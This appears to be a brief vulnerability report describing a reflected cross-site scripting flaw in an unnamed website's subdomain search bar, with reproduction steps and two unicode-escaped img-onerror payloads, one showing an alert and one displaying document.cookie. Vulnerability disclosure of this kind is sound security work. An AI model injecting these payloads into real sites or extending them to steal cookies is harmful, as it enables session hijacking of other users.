Reflected XSS. Steps :First open the website in any browser like chrome or Firefox.Navigate to the search bar where we search subdomain and inject the payload.Payload I:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(\u0022xss\u0022)\u003E\u0022.In similar way users cookies can also be stolen using this payload Payload II:\u002D\u0022\u003Cimg src\u003Dx onerror\u003Dalert(document.cookie)\u003E\u0022